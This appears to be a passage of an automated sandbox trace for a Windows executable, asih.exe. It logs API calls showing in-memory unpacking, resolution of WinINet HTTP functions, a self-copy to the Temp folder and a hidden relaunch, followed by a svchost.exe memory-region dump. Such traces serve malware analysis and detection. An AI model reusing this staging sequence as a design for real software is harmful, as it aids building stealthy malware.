[0270.040] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.040] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.040] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.040] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.041] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.041] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.041] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.041] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.041] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.041] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.041] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.042] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.042] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.042] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.042] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.042] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.042] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.042] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.043] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.043] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.043] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.043] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.043] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.043] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.043] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.044] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.044] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.044] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.044] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.044] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.044] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.045] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.045] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.045] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.045] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.045] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.045] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.046] DestroyWindow (hWnd=0x60064) returned 1 [0270.047] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0270.050] PostQuitMessage (nExitCode=6) [0270.092] MessageBoxA (hWnd=0x60064, lpText="turok", lpCaption=0x0, uType=0x4) returned 0 [0270.253] UpdateWindow (hWnd=0x0) returned 0 [0270.253] GetMessageA (in: lpMsg=0x505248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x505248) returned 0 [0270.258] VirtualAlloc (lpAddress=0x0, dwSize=0x48e4, flAllocationType=0x1000, flProtect=0x4) returned 0x570000 [0270.260] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0270.260] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x580000 [0270.260] VirtualAlloc (lpAddress=0x580000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x580000 [0270.261] VirtualAlloc (lpAddress=0x581000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x581000 [0270.262] VirtualAlloc (lpAddress=0x582000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x582000 [0270.262] VirtualAlloc (lpAddress=0x583000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x583000 [0270.263] VirtualAlloc (lpAddress=0x584000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x584000 [0270.264] VirtualAlloc (lpAddress=0x585000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x585000 [0270.264] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x72ae0000 [0270.385] GetProcAddress (hModule=0x72ae0000, lpProcName="HttpSendRequestW") returned 0x72deadb0 [0270.385] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetSetOptionW") returned 0x72d91e00 [0270.385] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetQueryOptionW") returned 0x72d900d0 [0270.386] GetProcAddress (hModule=0x72ae0000, lpProcName="HttpOpenRequestW") returned 0x72de5850 [0270.386] GetProcAddress (hModule=0x72ae0000, lpProcName="HttpQueryInfoW") returned 0x72d92700 [0270.386] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetReadFile") returned 0x72d92590 [0270.386] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetConnectW") returned 0x72de6d80 [0270.386] GetProcAddress (hModule=0x72ae0000, lpProcName="InternetOpenW") returned 0x72d7b8e0 [0270.386] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76fe0000 [0270.386] GetProcAddress (hModule=0x76fe0000, lpProcName="GetTempPathW") returned 0x77003380 [0270.387] GetProcAddress (hModule=0x76fe0000, lpProcName="GetFileSize") returned 0x770032c0 [0270.387] GetProcAddress (hModule=0x76fe0000, lpProcName="GetCurrentDirectoryW") returned 0x76ff8a40 [0270.387] GetProcAddress (hModule=0x76fe0000, lpProcName="DeleteFileW") returned 0x770030d0 [0270.387] GetProcAddress (hModule=0x76fe0000, lpProcName="CloseHandle") returned 0x77002e40 [0270.387] GetProcAddress (hModule=0x76fe0000, lpProcName="WriteFile") returned 0x77003510 [0270.387] GetProcAddress (hModule=0x76fe0000, lpProcName="lstrcmpW") returned 0x770007e0 [0270.387] GetProcAddress (hModule=0x76fe0000, lpProcName="ReadFile") returned 0x77003420 [0270.388] GetProcAddress (hModule=0x76fe0000, lpProcName="GetModuleHandleW") returned 0x77000db0 [0270.388] GetProcAddress (hModule=0x76fe0000, lpProcName="ExitProcess") returned 0x77004060 [0270.388] GetProcAddress (hModule=0x76fe0000, lpProcName="HeapCreate") returned 0x770009a0 [0270.388] GetProcAddress (hModule=0x76fe0000, lpProcName="HeapAlloc") returned 0x77ce52c0 [0270.388] GetProcAddress (hModule=0x76fe0000, lpProcName="GetModuleFileNameW") returned 0x77000860 [0270.388] GetProcAddress (hModule=0x76fe0000, lpProcName="CreateFileW") returned 0x770030a0 [0270.388] GetProcAddress (hModule=0x76fe0000, lpProcName="lstrlenW") returned 0x76ffe010 [0270.388] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75dc0000 [0270.389] GetProcAddress (hModule=0x75dc0000, lpProcName="wsprintfW") returned 0x75de48b0 [0270.389] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x77230000 [0271.209] GetProcAddress (hModule=0x77230000, lpProcName="ShellExecuteW") returned 0x7732c260 [0271.209] VirtualProtect (in: lpAddress=0x580000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff0c | out: lpflOldProtect=0x19ff0c*=0x4) returned 1 [0271.209] VirtualProtect (in: lpAddress=0x581000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0271.211] VirtualProtect (in: lpAddress=0x582000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0271.212] VirtualProtect (in: lpAddress=0x583000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0271.212] VirtualProtect (in: lpAddress=0x584000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0271.213] VirtualProtect (in: lpAddress=0x585000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fe90 | out: lpflOldProtect=0x19fe90*=0x4) returned 1 [0271.213] VirtualFree (lpAddress=0x570000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0271.225] GetModuleHandleW (lpModuleName=0x0) returned 0x580000 [0271.225] HeapCreate (flOptions=0x0, dwInitialSize=0x2000, dwMaximumSize=0x0) returned 0x2120000 [0271.226] RtlAllocateHeap (HeapHandle=0x2120000, Flags=0x8, Size=0x2000) returned 0x21205b8 [0271.227] RtlAllocateHeap (HeapHandle=0x2120000, Flags=0x8, Size=0x2000) returned 0x21225c0 [0271.227] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x21205b8, nSize=0x2000 | out: lpFilename="C:\\Users\\OqXZRaykm\\Desktop\\asih.exe" (normalized: "c:\\users\\oqxzraykm\\desktop\\asih.exe")) returned 0x23 [0271.227] GetTempPathW (in: nBufferLength=0x1000, lpBuffer=0x21225c0 | out: lpBuffer="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\") returned 0x25 [0271.227] wsprintfW (in: param_1=0x21225c0, param_2="%s%s" | out: param_1="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe") returned 45 [0271.227] CreateFileW (lpFileName="C:\\Users\\OqXZRaykm\\Desktop\\asih.exe" (normalized: "c:\\users\\oqxzraykm\\desktop\\asih.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0271.227] GetFileSize (in: hFile=0x1b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc8ea [0271.228] lstrlenW (lpString="C:\\Users\\OqXZRaykm\\Desktop\\asih.exe") returned 35 [0271.228] RtlAllocateHeap (HeapHandle=0x2120000, Flags=0x8, Size=0xc934) returned 0x2160048 [0271.485] ReadFile (in: hFile=0x1b8, lpBuffer=0x2160048, nNumberOfBytesToRead=0xc8ea, lpNumberOfBytesRead=0x19ff60, lpOverlapped=0x0 | out: lpBuffer=0x2160048*, lpNumberOfBytesRead=0x19ff60*=0xc8ea, lpOverlapped=0x0) returned 1 [0271.485] lstrcmpW (lpString1="C:\\Users\\OqXZRaykm\\Desktop\\asih.exe", lpString2="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe") returned 1 [0271.490] lstrlenW (lpString="C:\\Users\\OqXZRaykm\\Desktop\\asih.exe") returned 35 [0271.491] CreateFileW (lpFileName="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\temp\\asih.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0271.494] lstrlenW (lpString="C:\\Users\\OqXZRaykm\\Desktop\\asih.exe") returned 35 [0271.494] WriteFile (in: hFile=0x1c0, lpBuffer=0x2160048*, nNumberOfBytesToWrite=0xc934, lpNumberOfBytesWritten=0x19ff60, lpOverlapped=0x0 | out: lpBuffer=0x2160048*, lpNumberOfBytesWritten=0x19ff60*=0xc934, lpOverlapped=0x0) returned 1 [0271.516] CloseHandle (hObject=0x1b8) returned 1 [0271.516] CloseHandle (hObject=0x1c0) returned 1 [0271.521] GetTempPathW (in: nBufferLength=0x1000, lpBuffer=0x21205b8 | out: lpBuffer="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\") returned 0x25 [0271.521] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe", lpParameters=0x0, lpDirectory="C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\", nShowCmd=0) returned 0x2a [0279.703] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x17ac Thread: id = 3 os_tid = 0x141c Thread: id = 4 os_tid = 0x1420 Thread: id = 5 os_tid = 0x17f8 Thread: id = 6 os_tid = 0x610 Thread: id = 7 os_tid = 0x17fc Thread: id = 8 os_tid = 0x17e4 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x59e44000" os_pid = "0x620" os_integrity_level = "0x4000" os_privileges = "0x260914080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x260" cmd_line = "C:\\Windows\\system32\\svchost.exe -k appmodel -p" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-3369530244-1263555520-1552818992-544823788-1590281562" [0xa], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:00011c2c" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 424 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 425 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 426 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 427 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 428 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 429 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 430 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 431 start_va = 0x100000 end_va = 0x108fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 432 start_va = 0x110000 end_va = 0x1d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 433 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 434 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 435 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 436 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 437 start_va = 0x600000 end_va = 0x607fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "staterepository-deployment.srd-shm" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\StateRepository-Deployment.srd-shm" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\staterepository-deployment.srd-shm") Region: id = 438 start_va = 0x680000 end_va = 0x688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 439 start_va = 0x690000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 440 start_va = 0x890000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 441 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 442 start_va = 0xa30000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 443 start_va = 0xb00000 end_va = 0xb00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 444 start_va = 0xb10000 end_va = 0xb18fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 445 start_va = 0xb30000 end_va = 0xb37fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "staterepository-machine.srd-shm" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\StateRepository-Machine.srd-shm" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\staterepository-machine.srd-shm") Region: id = 446 start_va = 0xb40000 end_va = 0xb40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 447 start_va = 0xb50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 448 start_va = 0xb60000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 449 start_va = 0xb70000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 450 start_va = 0xc00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 451 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 452 start_va = 0xf00000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 453 start_va = 0x1000000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 454 start_va = 0x1200000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 455 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 456 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 457 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 458 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 459 start_va = 0x1a00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 460 start_va = 0x1c00000 end_va = 0x1d3efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 461 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 462 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 463 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 464 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 465 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 466 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 467 start_va = 0x7ff635380000 end_va = 0x7ff635390fff monitored = 0 entry_point = 0x7ff635384e80 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 468 start_va = 0x7ffc0ea60000 end_va = 0x7ffc0ea6ffff monitored = 0 entry_point = 0x7ffc0ea66080 region_type = mapped_file name = "wifidatacapabilityhandler.dll" filename = "\\Windows\\System32\\wifidatacapabilityhandler.dll" (normalized: "c:\\windows\\system32\\wifidatacapabilityhandler.dll") Region: id = 469 start_va = 0x7ffc0eaf0000 end_va = 0x7ffc0eafffff monitored = 0 entry_point = 0x7ffc0eaf60a0 region_type = mapped_file name = "cellulardatacapabilityhandler.dll" filename = "\\Windows\\System32\\cellulardatacapabilityhandler.dll" (normalized: "c:\\windows\\system32\\cellulardatacapabilityhandler.dll") Region: id = 470 start_va = 0x7ffc0ec20000 end_va = 0x7ffc0ec83fff monitored = 0 entry_point = 0x7ffc0ec613a0 region_type = mapped_file name = "capabilityaccessmanager.dll" filename = "\\Windows\\System32\\CapabilityAccessManager.dll" (normalized: "c:\\windows\\system32\\capabilityaccessmanager.dll") Region: id = 471 start_va = 0x7ffc0ece0000 end_va = 0x7ffc0ed1efff monitored = 0 entry_point = 0x7ffc0ecfe5f0 region_type = mapped_file name = "capabilityaccessmanagerclient.dll" filename = "\\Windows\\System32\\CapabilityAccessManagerClient.dll" (normalized: "c:\\windows\\system32\\capabilityaccessmanagerclient.dll") Region: id = 472 start_va = 0x7ffc10e30000 end_va = 0x7ffc10e80fff monitored = 0 entry_point = 0x7ffc10e62fd0 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 473 start_va = 0x7ffc17eb0000 end_va = 0x7ffc17ec9fff monitored = 0 entry_point = 0x7ffc17eb1d80 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 474 start_va = 0x7ffc1aee0000 end_va = 0x7ffc1b025fff monitored = 0 entry_point = 0x7ffc1aee7620 region_type = mapped_file name = "windows.staterepositoryps.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryPS.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryps.dll") Region: id = 475 start_va = 0x7ffc1b3b0000 end_va = 0x7ffc1b3c0fff monitored = 0 entry_point = 0x7ffc1b3b3900 region_type = mapped_file name = "windows.staterepositorycore.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryCore.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorycore.dll") Region: id = 476 start_va = 0x7ffc1b5c0000 end_va = 0x7ffc1b670fff monitored = 0 entry_point = 0x7ffc1b606e10 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 477 start_va = 0x7ffc1b680000 end_va = 0x7ffc1bc05fff monitored = 0 entry_point = 0x7ffc1b6d7790 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 478 start_va = 0x7ffc22fe0000 end_va = 0x7ffc23135fff monitored = 0 entry_point = 0x7ffc2300b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 479 start_va = 0x7ffc24450000 end_va = 0x7ffc24462fff monitored = 0 entry_point = 0x7ffc24453f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 480 start_va = 0x7ffc25fc0000 end_va = 0x7ffc25feafff monitored = 0 entry_point = 0x7ffc25fc2db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 481 start_va = 0x7ffc26140000 end_va = 0x7ffc26151fff monitored = 0 entry_point = 0x7ffc261455f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 482 start_va = 0x7ffc265b0000 end_va = 0x7ffc2662efff monitored = 0 entry_point = 0x7ffc265e73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 483 start_va = 0x7ffc26630000 end_va = 0x7ffc26739fff monitored = 0 entry_point = 0x7ffc26661300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 484 start_va = 0x7ffc26740000 end_va = 0x7ffc26766fff monitored = 0 entry_point = 0x7ffc26748690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 485 start_va = 0x7ffc26770000 end_va = 0x7ffc267cffff monitored = 0 entry_point = 0x7ffc26780380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 486 start_va = 0x7ffc267d0000 end_va = 0x7ffc2692cfff monitored = 0 entry_point = 0x7ffc2681efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 487 start_va = 0x7ffc269e0000 end_va = 0x7ffc26adffff monitored = 0 entry_point = 0x7ffc269f5ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 488 start_va = 0x7ffc26ae0000 end_va = 0x7ffc26b7cfff monitored = 0 entry_point = 0x7ffc26af5390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 489 start_va = 0x7ffc26b80000 end_va = 0x7ffc26e46fff monitored = 0 entry_point = 0x7ffc26b91bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 490 start_va = 0x7ffc26ea0000 end_va = 0x7ffc26ec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 491 start_va = 0x7ffc26ee0000 end_va = 0x7ffc26f89fff monitored = 0 entry_point = 0x7ffc26ef5470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 492 start_va = 0x7ffc26f90000 end_va = 0x7ffc2702dfff monitored = 0 entry_point = 0x7ffc26f97850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 493 start_va = 0x7ffc27110000 end_va = 0x7ffc27463fff monitored = 0 entry_point = 0x7ffc27201d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 494 start_va = 0x7ffc27470000 end_va = 0x7ffc2760ffff monitored = 0 